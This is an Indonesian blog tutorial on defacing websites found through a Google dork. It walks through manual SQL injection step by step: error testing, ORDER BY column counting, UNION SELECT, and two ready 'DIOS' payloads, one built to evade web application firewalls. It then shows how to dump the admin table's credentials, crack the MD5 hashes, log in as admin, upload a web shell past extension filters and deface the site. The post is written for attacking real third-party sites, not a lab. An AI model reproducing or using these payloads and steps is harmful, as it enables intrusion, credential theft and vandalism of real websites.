Tempat para Developer Gaptek

AD BANNER

31 August 2017

Tutorial Deface Teknik SQL Injection Manual (With DIOS)

Assalamu'alaikum wr.wb

Pagi guys!
Hari ini saya akan bagikan cara deface menggunakan teknik sql injection manual with DIOS. SQL Injection merupakan teknik Hacking dimana QUERY SQL di injectkan melalui URL yang selanjutnya akan diproses oleh komputer. Lalu apa itu DIOS? DIOS merupakan singkatan dari DUMP IN ONE SHOT. Maksud dari teknik ini adalah memunculkan seluruh isi database dalam satu queri saja. paham? Lanjut!

tutorial deface menggunakan teknik sql injecion

Bahan :
1. Dork SQL INJECTION :
- inurl:view.php?cid=
dork lainnya bisa dilihat disini

2. Mozilla with Tamper Data Addon (optional, kalo webnya gabisa upload php. jadi coba di bypass aja)


Tutorial :
1. Dorking target & pilih targetnya.
tutorial deface teknik sqli


2. Cek apakah VULN atau tidak dengan menambahkan karakter kutip ( ' ) dibelakang variabel ID nya. Note: jika VULN, maka akan muncul 'You have an error in your SQL syntax blablabla...' atau halaman webnya berubah menjadi kosong/error.
cth: site.co.li/index.php?id=69'
cara deface menggunakan teknik sqli


3. Nah, kalo error seperti gambar diatas, sekarang tinggal kita cari tau jumlah TABLE yang ada pada databasenya, cukup dengan menebak-nebak saja sih. Caranya tambahkan query ORDER BY serta jumlah tabel yang mau di cek.
cth: site.co.li/index.php?id=69+order+by+10--+-
teknik sql injection untuk pemula


4. Pada gambar diatas terlihat pagenya masih menunjukan error, otomatis jumlah tablenya gak nyampe 10 kan? kita turunin lagi jumlah tablenya sampai ga ada error.
cth: site.co.li/index.php?id=69+order+by+9--+-  <  Error; Unknown column '9' in 'order clause'
site.co.li/index.php?id=69+order+by+8--+-  <  Error; Unknown column '8' in 'order clause'
site.co.li/index.php?id=69+order+by+7--+-  <  Error; Unknown column '7' in 'order clause'
site.co.li/index.php?id=69+order+by+6--+-  <  Error; Unknown column '6' in 'order clause'
site.co.li/index.php?id=69+order+by+5--+-  <  No Error
tutorial deface teknik sql injection


5. Sekarang kita sudah tau berapa jumlah tablenya. Tinggal cari table yang VULNERABLE. Caranya masukan query UNION SELECT dan dibarengi jumlah tablenya serta tambahkan karakter minus ( - ) di belakang variable IDnya.
cth: site.co.li/index.php?id=-69+union+select+1,2,3,4,5--+-
tutorial deface teknik dump in one shot


6. Pada gambar diatas, muncul table nomor berapa saja yang VULNERABLE, disitulah exploitnya dimasukan. Caranya, lihat dulu nomer yang VULNERABLE, lalu masukan QUERY DIOS pada nomor yang vulnerable tadi.
cth: site.co.li/index.php?id=-69+union+select+1,EXPLOIT,3,4,5--+-

Exploit :

MadBlood DIOS :
(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2))

 ZEN with WAF DIOS:
(/*!12345sELecT*/(@)from(/*!12345sELecT*/(@:=0x00),(/*!12345sELecT*/(@)from(`InFoRMAtiON_sCHeMa`.`ColUMNs`)where(`TAblE_sCHemA`=DatAbAsE/*data*/())and(@)in(@:=CoNCat%0a(@,0x3c62723e5461626c6520466f756e64203a20,TaBLe_nAMe,0x3a3a,column_name))))a)
Nanti hasilnya akan seperti ini. Lalu cari table yang sekiranya berhubungan dengan akun ADMIN.
tutorial exploit sql injection


7. Ternyata terdapat table yang namanya "admins" sekaligus isi dari table admins nya sendiri (id,code,name,password,dll pada gambar itulah yang dinamakan kolomnya). Tinggal kita cari tau isi dari kolom yang kita inginkan seperti kolom username,password,email,dll. Caranya menggunakan query GROUP_CONCAT.
cth: site.co.li/index.php?id=-69+union+select+1,group_concat(id,0x3a,password,0x3a,name),3,4,5+from+admins--+-
tutorial deface untuk pemula


8. Sudah keliatan username & passwordnya kan? tapi passwordnya masih dalam keadaan dienkripsi (md5). Tinggal Crack saja passwordnya. Caranya Tutorial Crack Password MD5.


9. OK! GOT PASSWORD! tinggal login ke halaman adminnya! Cari halaman adminnya, biasanya dengan menambahkan /admin atau /administrator pada webnya. atau bisa gunakan Tutorial Mencari Halaman Login Admin Menggunakan DirBuster.
cth: site.co.li/admin
tutorial mencari halaman login admin


10. LOGGED IN! dengan user SUPER ADMIN! tinggal kita cari tempat upload script/shell.
tutorial crack password md5


11. Siapkan shell/script defacenya. lalu upload saja. Note: jika tidak bisa upload .php, lakukan Teknik Bypass Extension.
tutorial deface bagi pemula


12. UPLOADED! karena kita tadi nge-upload di form gambar, kita buka saja gambar/thumbnail yang muncul.
tutorial sql injection untuk pemula


13. Shell Terupload! tinggal eksekusi saja! kali ini saya hanya ntip file saja walaupun bisa ngindex. Note: Ngindex? Backup dulu nyet!
tutorial dump in one shot


14. TERTUSUK!
tutorial deface teknik dump in one shot


15. DONE!

gampang kan? masih bingung? tanyakan di kolom komentar!
Nitip nick juga imSoulHunterz_

oke sekian tutorial deface teknik sqli with dios,
mohon maaf bila ada kesalahan.

Wassalamu'alaikum wr.wb

4 comments:

###

AD BANNER